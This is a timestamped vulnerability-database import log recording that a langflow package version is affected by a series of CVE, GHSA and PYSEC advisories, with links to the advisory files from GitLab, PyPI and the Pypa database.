2026-06-06T06:29:21.139498+00:00 GitLab Importer Affected by VCID-ysnc-jyxb-6qcy https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2025-34291.yml 38.6.0
2026-06-06T06:00:23.742193+00:00 GitLab Importer Affected by VCID-fc5h-qc2t-xqc3 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2025-57760.yml 38.6.0
2026-06-06T05:52:56.298944+00:00 GitLab Importer Affected by VCID-wv26-29b9-vqgg https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2025-3248.yml 38.6.0
2026-06-06T05:46:05.175623+00:00 GitLab Importer Affected by VCID-ztx2-wefa-c7bk https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/GHSA-c995-4fw3-j39m.yml 38.6.0
2026-06-06T05:29:13.291122+00:00 GitLab Importer Affected by VCID-jt18-vv56-2fgx https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2024-48061.yml 38.6.0
2026-06-06T05:28:51.879985+00:00 GitLab Importer Affected by VCID-s17d-sfjq-z7eg https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2024-42835.yml 38.6.0
2026-06-06T05:24:57.260305+00:00 GitLab Importer Affected by VCID-9k4q-zwxf-euh1 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2024-9277.yml 38.6.0
2026-06-06T05:06:37.866652+00:00 GitLab Importer Affected by VCID-ef87-295y-zbha https://gitlab.com/gitlab-org/advisories-community/-/blob/main/pypi/langflow/CVE-2024-37014.yml 38.6.0
2026-06-05T17:05:09.666233+00:00 PyPI Importer Affected by VCID-v5pc-pdm9-97g8 https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:05:08.302914+00:00 PyPI Importer Affected by VCID-ncvf-vzqr-uydz https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:05:07.500423+00:00 PyPI Importer Affected by VCID-q4r1-xjfk-7bg9 https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:04:48.076064+00:00 PyPI Importer Affected by VCID-sbea-kkfu-akgb https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:04:44.851054+00:00 PyPI Importer Affected by VCID-ysnc-jyxb-6qcy https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:04:30.760875+00:00 PyPI Importer Affected by VCID-wv26-29b9-vqgg https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-05T17:03:51.856028+00:00 PyPI Importer Affected by VCID-ef87-295y-zbha https://osv-vulnerabilities.storage.googleapis.com/PyPI/all.zip 38.6.0
2026-06-02T04:24:26.392645+00:00 Pypa Importer Affected by VCID-v5pc-pdm9-97g8 https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2026-82.yaml 38.6.0
2026-06-02T04:24:23.088737+00:00 Pypa Importer Affected by VCID-ncvf-vzqr-uydz https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2026-81.yaml 38.6.0
2026-06-02T04:24:21.294978+00:00 Pypa Importer Affected by VCID-q4r1-xjfk-7bg9 https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2026-78.yaml 38.6.0
2026-06-02T04:23:36.949017+00:00 Pypa Importer Affected by VCID-sbea-kkfu-akgb https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2025-125.yaml 38.6.0
2026-06-02T04:23:29.258966+00:00 Pypa Importer Affected by VCID-ysnc-jyxb-6qcy https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2025-78.yaml 38.6.0
2026-06-02T04:22:57.065361+00:00 Pypa Importer Affected by VCID-wv26-29b9-vqgg https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2025-36.yaml 38.6.0
2026-06-02T04:21:29.598290+00:00 Pypa Importer Affected by VCID-ef87-295y-zbha https://github.com/pypa/advisory-database/blob/main/vulns/langflow/PYSEC-2024-177.yaml 38.6.0